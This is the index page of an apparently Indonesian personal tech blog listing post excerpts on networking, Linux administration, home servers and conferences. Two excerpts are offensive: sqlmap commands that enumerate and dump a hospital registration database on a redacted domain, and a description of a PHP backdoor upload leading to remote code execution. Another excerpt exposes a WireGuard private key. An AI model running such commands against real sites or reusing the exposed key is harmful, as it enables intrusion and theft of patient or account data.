<!DOCTYPE html>
<html lang="en-us">
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <title>Just /var/log//posts/</title>
    
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="robots" content="all,follow">
    <meta name="googlebot" content="index,follow,snippet,archive">
    <link rel="stylesheet" href="https://bembenk18.github.io/hugo-theme-console/css/terminal-0.7.2.min.css">
    <link rel="stylesheet" href="https://bembenk18.github.io/hugo-theme-console/css/animate-4.1.1.min.css">
    <link rel="stylesheet" href="https://bembenk18.github.io/hugo-theme-console/css/console.css">
    
      <!--[if lt IE 9]>
          <script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script>
          <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
      <![endif]-->
       
      <link href="https://bembenk18.github.io/posts/index.xml" rel="alternate" type="application/rss+xml" title="Just /var/log/" />
    <meta property="og:title" content="Posts" />
<meta property="og:description" content="" />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://bembenk18.github.io/posts/" />


<meta name="twitter:title" content="Posts"/>
<meta name="twitter:description" content=""/>

  
    
      <script async src="https://www.googletagmanager.com/gtag/js?id=G-438PNW325R"></script>
      <script>
        var doNotTrack = false;
        if ( false ) {
          var dnt = (navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack);
          var doNotTrack = (dnt == "1" || dnt == "yes");
        }
        if (!doNotTrack) {
          window.dataLayer = window.dataLayer || [];
          function gtag(){dataLayer.push(arguments);}
          gtag('js', new Date());
          gtag('config', 'G-438PNW325R');
        }
      </script>
    
  


</head>
<body class="terminal">
    <div class="container">
        <div class="terminal-nav">
          <header class="terminal-logo">
            <div class="logo terminal-prompt">
              
              
              <a href="https://bembenk18.github.io/" class="no-style ">Just /var/log/</a>:~# 
              <a href='https://bembenk18.github.io/posts'>posts</a>/</div></header>
          <nav class="terminal-menu">
            <ul vocab="https://schema.org/" typeof="BreadcrumbList">
                
            </ul>
          </nav>
        </div>
    </div>

    <div class="container " >
        
<h1>Posts</h1>
<br/>


<div class="posts-list">

    
        <div class="post">
            <p>
                <div class="date">Oct. 31, 2024</div>    
                <h1><a href="https://bembenk18.github.io/posts/upgrade-home-server/" title="Upgrade Home Server">Upgrade Home Server</a></h1>
                Masih ingat dengan postingan home server ini? Karena makin besar keperluan komputasi akhirnya memutuskan untuk upgrade ke mesin yang lebih besar.
Ada beberapa pertimbangan diantaranya adalah ukuran yang kecil dan kosumsi daya bisa serendah mungkin tapi tetap powerffull, beberapa kriteria adalah sebagai berikut:
Dell Wyse 5070 Dell Optiplex 3050 Lenovo Thinkcentre M710Q Dari 3 pilihan diatas akhirnya memutuskan meminang Thinkcentre M710Q dengan spesifikasi:
Core i3 7100T 2C/4T 3.40 GHz 35W 16 GB DDR4 2400 (2x8GB) PC ini saya beli tanpa SSD, karena sudah ada SSD M.
            </p>
        </div>
    

    
        <div class="post">
            <p>
                <div class="date">Sep. 14, 2024</div>    
                <h1><a href="https://bembenk18.github.io/posts/flash-openwrt-tp-link-wr1043nd/" title="Flash OpenWrt TP Link WR1043ND">Flash OpenWrt TP Link WR1043ND</a></h1>
                Pendahuluan Saat ini internet di rumah saya memiliki kecepatan 30Mb/s, namun baru sadar kalau speed wireless dari mikrotik RB941 mentok 15Mb/s pada jarak 5 meter (mungkin karena cuma pakai antena internal saja). Setelah mencari router yang cocok, ada 2 pilihan sebagai berikut:
Model Wireless Port RJ45 Harga Mi 4 Gigabit 2.4G &amp; 5G 3 / Gigabit 350k TP-Link TL WR1043ND v2.1 2.4G 5 / Gigabit &lt; 150K (Bekas) Setelah beberapa pertimbangan akhirnya pilih TP-Link dengan harga 128k (diskon jadi 78k wkwkwk), karena ini router tua jadi beberapa fitur sudah tertinggal, jadi agar lebih optimal maka saya akan coba flash dengan firmware OpenWrt.
            </p>
        </div>
    

    
        <div class="post">
            <p>
                <div class="date">Aug. 25, 2024</div>    
                <h1><a href="https://bembenk18.github.io/posts/cloudflare-warp-on-mikrotik/" title="Setup Cloudflare Warp on Mikrotik">Setup Cloudflare Warp on Mikrotik</a></h1>
                Sesuai sabda pak Anton Wibowo tentang VPN dibawah ini, maka saya akan coba setup Cloudflare Warp di Mikrotik Karena disini kita akan pakai Wireguard maka wajib menggunakan RouterOS versi 7.
Buat akun Warp Untuk membuat akun disini saya akan pakai tools ini https://github.com/ViRb3/wgcf (Silahkan dibaca sendiri tutorialnya:v) Setelah itu kita akan mendapatkan file wgcf-profile.conf yang berisi ➜ Network cat wgcf-profile.conf [Interface] PrivateKey = mAmDoyJ8Qf/2sEyuhjhPytLDtx8ioiEaJh3q8K8iE3u2U= Address = 172.16.0.2/32 Address = 2606:4700:110:84ca:7d82:b1d:7534:56f9/128 DNS = 1.
            </p>
        </div>
    

    
        <div class="post">
            <p>
                <div class="date">Jul. 10, 2024</div>    
                <h1><a href="https://bembenk18.github.io/posts/manually-build-vyos/" title="Manually Build Vyos">Manually Build Vyos</a></h1>
                Kapan kita perlu build Vyos manual? karena di website Vyos hanya tersedia versi Rolling Release untuk versi gratis.
Requirements Debian Jessie untuk VyOS 1.2 (crux) Debian Buster untuk VyOS 1.3 (equuleus) Debian Bookworm untuk VyOS 1.4 (sagitta) Debian Bookworm untuk VyOS 1.5 &amp; rolling release Clone repository # VyOS 1.2 (crux) $ git clone -b crux --single-branch https://github.com/vyos/vyos-build # VyOS 1.3 (equuleus) $ git clone -b equuleus --single-branch https://github.com/vyos/vyos-build # VyOS 1.
            </p>
        </div>
    

    
        <div class="post">
            <p>
                <div class="date">May. 13, 2024</div>    
                <h1><a href="https://bembenk18.github.io/posts/install-kamailio-voip-server/" title="Install Kamailio VOIP Server">Install Kamailio VOIP Server</a></h1>
                Pengenalan Kamailio adalah Server SIP Sumber Terbuka yang kuat, dapat menangani ribuan panggilan per detik. Dapat digunakan untuk membangun platform besar VoIP dan komunikasi real-time seperti pesan instan, keberadaan, dan WebRTC. Fiturnya mencakup komunikasi aman, penyeimbangan beban, otentikasi, dan dukungan untuk berbagai sistem backend. Cocok untuk gateway SIP, PBX, dan server media seperti Asterisk dan FreeSWITCH.
Proses installasi Tambahkan repositori root@aml:~# cat /etc/apt/sources.list deb http://deb.kamailio.org/kamailio55 buster main deb-src http://deb.kamailio.org/kamailio55 buster main Install mariadb dan kamailio apt install mariadb-server kamailio kamailio-mysql-modules kamailio-ims-modules Edit file konfigurasi kamailio (edit baris berikut ini) root@aml:~# cat /etc/kamailio/kamctlrc SIP_DOMAIN=192.
            </p>
        </div>
    

    
        <div class="post">
            <p>
                <div class="date">Dec. 28, 2023</div>    
                <h1><a href="https://bembenk18.github.io/posts/sql-injection-form-pendaftaran-rumah-sakit/" title="P1 SQL Injection Form Pendaftaran Rumah Sakit">P1 SQL Injection Form Pendaftaran Rumah Sakit</a></h1>
                Saat akan daftar disalah satu rumah sakit tiba tiba kepikiran bisa gak sih form iin di inject?
POC Buka form pendaftaran, isikan dengan random data Intercept post data dengan OWASP ZAP Setelah itu coba dengan sqlmap sqlmap -u https://redacted.com/index.php/CProsesDaftar/getpasien&#34; --data=&#34;nomrm=Halo&amp;tgllahir=2025-05-07&amp;nik=9827982798279827&amp;search=nomrm&amp;tglperiksa=2023-12-07&#34; --level 5 --risk 3 --banner --ignore-code 401 --technique=B --flush --dbs --threads 2 Lihat isi table invoice sqlmap -u &#34;https://redacted.com/index.php/CProsesDaftar/getpasien&#34; --data=&#34;nomrm=Halo&amp;tgllahir=2025-05-07&amp;nik=9827982798279827&amp;search=nomrm&amp;tglperiksa=2023-12-07&#34; --level 5 --risk 3 --banner --ignore-code 401 --technique=B --flush --threads 2 -D redacted-database --tables Dump table sqlmap -u &#34;https://redacted.
            </p>
        </div>
    

    
        <div class="post">
            <p>
                <div class="date">Nov. 18, 2023</div>    
                <h1><a href="https://bembenk18.github.io/posts/allow-winbox-discovery/" title="Allow Winbox Discovery">Allow Winbox Discovery</a></h1>
                Secara default winbox di openSUSE tidak menampilkan Neighbors karena terblokir oleh firewall. Kita harus allow manual.
sudo firewall-cmd --permanent --service=winbox-discover --add-port=5678/udp sudo firewall-cmd --zone=public --add-service=winbox-discover --permanent sudo firewall-cmd --reload 
            </p>
        </div>
    

    
        <div class="post">
            <p>
                <div class="date">Oct. 17, 2023</div>    
                <h1><a href="https://bembenk18.github.io/posts/louca23/" title="Solo to Solo | LOUCA 2023">Solo to Solo | LOUCA 2023</a></h1>
                Halo semua, disini aku mau berbagi pengalaman ikut LibreOffice Conf. Asia UbuCon Asia 2023 atau bisa disingkat LOUCA23.
Sebenarnya aku mau berangkat berdua dengan temanku tapi dia batal berangkat karena sakit, yo wes lah karena sudah booking tiket kereta dan penginapan mau gak mau aku harus berangkat sendiri biar gak terlalu rugi wkwkwk.
Day 0 (Jumat 06 Oktober 2023) Sekitar jam 14:30 aku berangkat dari tempat kerja ke stasiun dan kereta berangkat dari stasiun Jombang jam 15:10.
            </p>
        </div>
    

    
        <div class="post">
            <p>
                <div class="date">Sep. 27, 2023</div>    
                <h1><a href="https://bembenk18.github.io/posts/bongkar-apk-undangan-online/" title="Bongkar Apk Undangan Online">Bongkar Apk Undangan Online</a></h1>
                Abstraksi Sudah lama saya ingin bongkar aplikasi penipuan semacam ini, tetapi tak kunjunag ada penipu yang mengirimkannya wkwkw. Akhirnya ada seseorang yang mengirimkan aplikasi dengan nama UNDANGAN.apk di salah satu group, lalu tanpa pikir panjang saya memutuskan untuk mencoba bongkar aplikasi ini.
Informasi dasar file Nama : UNDANGAN.apk MD5 : 5668b313d21604a67e2b50f58d516dff SHA1 : b60bf67c109ed43a7af4a70ca3a18f8d212a2598 SHA256 : 125c855d439895581bedf1b30bb779313058feb7f114f32167d45d427f27fe0c Hasil decompile file apk Setelah decompile bisa kita lihat terdapat file Manifest dengan nama AndroidManifest.
            </p>
        </div>
    

    
        <div class="post">
            <p>
                <div class="date">Sep. 7, 2023</div>    
                <h1><a href="https://bembenk18.github.io/posts/rce-upload-csv/" title="RCE Upload CSV">RCE Upload CSV</a></h1>
                Abstraksi Bug ini memungkinkan attacker untuk mengupload file backdoor. Bug ini muncul karena tidak ada filtering type file yang diupload sehingga memungkinkan attacker untuk mengupload file backdoor berekstensi .php.
&lt;div class=&quot;col-12 pb-2&quot;&gt; &lt;div class=&quot;input-group&quot;&gt; &lt;div class=&quot;custom-file&quot;&gt; &lt;input type=&quot;file&quot; class=&quot;custom-file-input&quot; name=&quot;filedata&quot; id=&quot;exampleInputF&quot;&gt; &lt;label class=&quot;custom-file-label&quot; for=&quot;exampleInput&quot;&gt;Choose file&lt;/label&gt; &lt;/div&gt; &lt;/div&gt; &lt;/div&gt; Impact Remote Code Execution
Proof of Concept: Login ke https://www.redacted.com/ Masuk ke menu Upload data pelanggan Klik Choose file dan pilih file .
            </p>
        </div>
    

    
        <div class="post">
            <p>
                <div class="date">Jun. 15, 2023</div>    
                <h1><a href="https://bembenk18.github.io/posts/upgrade-debian-11-to-12/" title="Upgrade Debian 11 to 12">Upgrade Debian 11 to 12</a></h1>
                Testing upgrade dari debian 11 ke debian 12 di STB HG680P
Posisi sebelum update Ganti repo Ganti ke bullseye menjadi bookworm seperti berikut ini
# sudo nano /etc/apt/sources.list deb http://deb.debian.org/debian bookworm main contrib non-free deb http://deb.debian.org/debian bookworm -updates main contrib non-free deb http://security.debian.org/debian-security bookworm-security main deb http://ftp.debian.org/debian bookworm-backports main contrib non-free Setelah ganti repository lakukan update repository baru sudo apt update Upgrade sudo apt upgrade --without-new-pkgs sudo apt full-upgrade Reboot sudo systemctl reboot Debian 11 berhasil terpasang Do it at your own risk
            </p>
        </div>
    

    
        <div class="post">
            <p>
                <div class="date">Apr. 27, 2023</div>    
                <h1><a href="https://bembenk18.github.io/posts/mesin-tua/" title="Mesin Tua">Mesin Tua</a></h1>
                Mesin tua 1 (Thinkpad x61) Spesifikasi Intel Core 2 Duo CPU T8100 (2.10 GHz) 2GB DDR2 128MB VRAM 80GB HDD Gak sengaja nemu di FB marketplace dengan harga 150k dengan kondisi matot, dugaan awal matot karena baterai konslet. Setelah beli dan oprek sana sini belum berhasil nyala juga, akhrinya ketemu teman di group tele Pegel Thinkpad yang nyaranin ganti mobo. Setelah ganti mobo akhirnya berhasil nyala.
Mods Setelah nyala akhirnya niat iseng muncul juga untuk flash Midleton Bios agar bisa menggunakan ram 2x4GB (Walau pun sampai sekarang masih pakai 1x2GB karena harga sekeping 4GB hampir sejuta;v).
            </p>
        </div>
    

    
        <div class="post">
            <p>
                <div class="date">Apr. 14, 2023</div>    
                <h1><a href="https://bembenk18.github.io/posts/ssh-dengan-google-authenticator/" title="Akses SSH Dengan Google Authenticator">Akses SSH Dengan Google Authenticator</a></h1>
                Ada banyak cara yang dapat dilakukan untuk mengamankan akses SSH ke server, salah satunya dengan Google Authenticator.
Installasi sudo apt install libpam-google-authenticator -y Tambahkan Google Authenticator ke HP google-authenticator -s ~/.ssh/google_auth Setelah muncul QR code scan dengan Google Authenticator pada HP, Kemudian masukan kode yang muncul ke terminal
dan ikuti panduannya hingga selesai.
Konfigurasi 2FA SSH Tambahkan baris berikut pada file /etc/pam.d/sshd
auth required pam_google_authenticator.so secret=/home/${USER}/.ssh/google_auth nullok Edit baris berikut pada file /etc/ssh/sshd_config
            </p>
        </div>
    

    
        <div class="post">
            <p>
                <div class="date">Apr. 14, 2023</div>    
                <h1><a href="https://bembenk18.github.io/posts/ssh-ke-mesin-lokal-dengan-tailscale/" title="SSH Ke Mesin Lokal Dengan Tailscale">SSH Ke Mesin Lokal Dengan Tailscale</a></h1>
                Tailscale adalah aplikasi opensource berbasis WireGuard, tailscale memungkinkan untuk membangun jaringan peer to peer private. Dalam case saya gunakan untuk akses Home server.
Installasi curl -fsSL https://tailscale.com/install.sh | sh Start Tailscale service sudo tailscale up Saat pertama kali akan diminta login, silahkan login dengan link yang muncul dikonsole, jika berhasil dijalankan kita akan mendapatkan ip seperti dibawah ini: Web Interface Untuk mempermudah mengelola service Tailscale menyediakan web interface di link berikut Test akses SSH Test akses SSH ke server Dokumentasi Repo dan dokumentasi tentang Tailscale bisa diakses di https://github.
            </p>
        </div>
    

    
        <div class="post">
            <p>
                <div class="date">Apr. 10, 2023</div>    
                <h1><a href="https://bembenk18.github.io/posts/home-server-armbian/" title="Home Server Armbian">Home Server Armbian</a></h1>
                Armbian adalah salah satu distro linux yang mendukung processor arm64 dengan
spesifikasi rendah, salah satunya adalah STB HG680P yang banyak beredar dengan harga under 300k. STB ini juga bisa dijadikan alternative dari Raspberry Pi yang harganya semakin naik.
Spesifikasi RAM : 2 GB ROM Internal : 8 GB CPU : Quad Core Amlogic s905x Cortex-A53 @ up to 1.51 GHz Dengan spesifikasi tersebut sudah cukup untuk menjalankan Armbian. Untuk Armbian saya pasang pada microSD Sandisk Ultra UHS-I 32GB.
            </p>
        </div>
    

    
        <div class="post">
            <p>
                <div class="date">Mar. 27, 2023</div>    
                <h1><a href="https://bembenk18.github.io/posts/cisco-packet-tracer-opensuse/" title="Cisco Packet Tracer Opensuse">Cisco Packet Tracer Opensuse</a></h1>
                Di website netacad Cisco Packet Tracer hanya tersedia untuk Ubuntu/Debian dengan format .deb, jadi secara default tidak tersedia di distro rpm based. Untuk itu perlu memasang secara manual.
1. Download Download file installasi untuk Ubuntu/Debian dari web netacad
2. Unpack file .deb mkdir /tmp/cpt cp CiscoPacketTracer_820_Ubuntu_64bit.deb /tmp/cpt ar -xv CiscoPacketTracer_820_Ubuntu_64bit.deb mkdir control tar -C control -Jxf control.tar.xz mkdir data tar -C control -Jxf data.tar.xz cd data 3. Install cp -r usr / cp -r opt / Tumbleweed
            </p>
        </div>
    

    
        <div class="post">
            <p>
                <div class="date">Mar. 26, 2023</div>    
                <h1><a href="https://bembenk18.github.io/posts/setup-fail2ban-zimbra/" title="Setup Fail2Ban Zimbra">Setup Fail2Ban Zimbra</a></h1>
                0. sudo -u zimbra - zmprov mcf +zimbraMailTrustedIP 127.0.0.1 +zimbraMailTrustedIP {IP of Server} zmcontrol restart 1. Install Fail2Ban yum install epel-release -y yum install fail2ban -y 2. Buat file jail.conf *Jika ingin whitelist IP tambahkan pada baris ignoreip
nano /etc/fail2ban/jail.local
[DEFAULT] # &quot;ignoreip&quot; can be a list of IP addresses, CIDR masks or DNS hosts. # Fail2ban will not ban a host which matches an address in this list. # Several addresses can be defined using space (and/or comma) separator.
            </p>
        </div>
    

    
        <div class="post">
            <p>
                <div class="date">Mar. 26, 2023</div>    
                <h1><a href="https://bembenk18.github.io/posts/ssh-forwading/" title="Expose jaringan lokal ke internet dengan SSH Forwading">Expose jaringan lokal ke internet dengan SSH Forwading</a></h1>
                
            </p>
        </div>
    

    
        <div class="post">
            <p>
                <div class="date">Nov. 23, 2022</div>    
                <h1><a href="https://bembenk18.github.io/posts/build-kernel-opensuse-15-4/" title="Build Kernel openSUSE 15.4">Build Kernel openSUSE 15.4</a></h1>
                Karena openSUSE Leap mengutamakan kestabilan maka untuk dapat mencoba kernel 6.* saya harus menunggu cukup lama, pada catatan kali ini saya akan coba build kernel 6.* di openSUSE Leap 15.4
1. Persiapan Install Requirements dan buat folder yang diperlukan spesifikasi sudo zypper ref &amp;&amp; sudo zypper update sudo zypper in -t pattern devel_basis bc openssl openssl-devel dwarves rpm-build libelf-devel elfutils-libelf-devel sudo mkdir ~/kernel
2. Download kernel Download kernel dari https://kernel.
            </p>
        </div>
    

    
        <div class="post">
            <p>
                <div class="date">Nov. 7, 2022</div>    
                <h1><a href="https://bembenk18.github.io/posts/indonesia-linux-confrence-2022/" title="Indonesia Linux Confrence 2022">Indonesia Linux Confrence 2022</a></h1>
                Akhirnya setelah menunggu cukup lama saya bisa mengikuti acara Opensource untuk pertama kali, acara kali ini adalah Indonesia Linux Confrence 2022 yang diselenggarakan di Universitas Muhammadiyah Sidoarjo pada hari Sabtu tanggal 5 November 2022. Day 0 (4 November 2022) Sekitar jam 4 sore saya berangkat dari kantor menuju rumah teman yang telah janjian untuk berangkat bareng, sebenanrnya kami akan berangkat ber 3 tapi ternyata salah satu teman saya sudah berangkat sejak pagi karena ada urusan pekerjaan.
            </p>
        </div>
    

    
        <div class="post">
            <p>
                <div class="date">Mar. 29, 2022</div>    
                <h1><a href="https://bembenk18.github.io/posts/install-middleton-bios-thinkpad-x61/" title="Install Middleton Bios Thinkpad X61">Install Middleton Bios Thinkpad X61</a></h1>
                Masih dengan mesin x61, setelah menyelam di reddit ketemu sebuah postingan tentang thinkpad x61 dengan bios mod. Setelah baca ternyata fiturnya lumayan banyak daripada bios bawaan. 2 fitur yang menarik adalah unlock SATA II dan RAM yang bisa max 8GB (Walaupun sekeping 4GB DDR2 harganya hampir sejuta).
Proses Flash Ada 2 cara:
Cara 1 Download Iso bios Burn ke flashdisk Boot ke flaskdisk Gabisa pakai cara ini karena harus ada baterai
            </p>
        </div>
    

</div>


        <div class="footer">
    Powered by <a href="https://gohugo.io/">Hugo</a> with
    <a href="https://github.com/mrmierzejewski/hugo-theme-console/">Console Theme</a>. 
</div>

    </div>
  </body>
</html>
